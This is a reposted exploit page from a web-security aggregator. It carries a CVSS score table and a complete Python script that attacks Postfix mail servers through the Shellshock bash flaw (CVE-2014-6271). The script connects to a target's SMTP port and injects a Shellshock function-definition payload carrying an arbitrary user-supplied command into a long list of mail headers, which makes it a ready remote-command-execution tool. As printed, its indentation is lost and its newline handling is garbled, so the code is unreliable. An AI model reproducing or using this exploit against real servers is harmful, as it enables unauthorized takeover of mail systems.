HackDig : Dig high-quality web security articles for hacker

Postfix SMTP Shellshock

2014-10-07 03:40
CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

from socket import *
import sys

def usage():
print "shellshock_smtp.py <target> <command>"

argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)

rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]

headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])

s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))

# banner grab
s.recv(2048*4)

def netFormat(d):
d += "n"
return d.encode('hex').decode('hex')

data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)

data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)

data = netFormat("data")
s.send(data)
s.recv(2048*4)

data = ''
for h in headers:
data += netFormat(h + ":() { :; };" + cmd)

data += netFormat(cmd)

# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')

s.send(data)
s.recv(2048*4)

data = netFormat("quit")
s.send(data)
s.recv(2048*4)


Source: 7300014102-BLW/eussi/moc.ytirucesxc

Read:3604 | Comments:0 | Tags:No Tag

“Postfix SMTP Shellshock”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud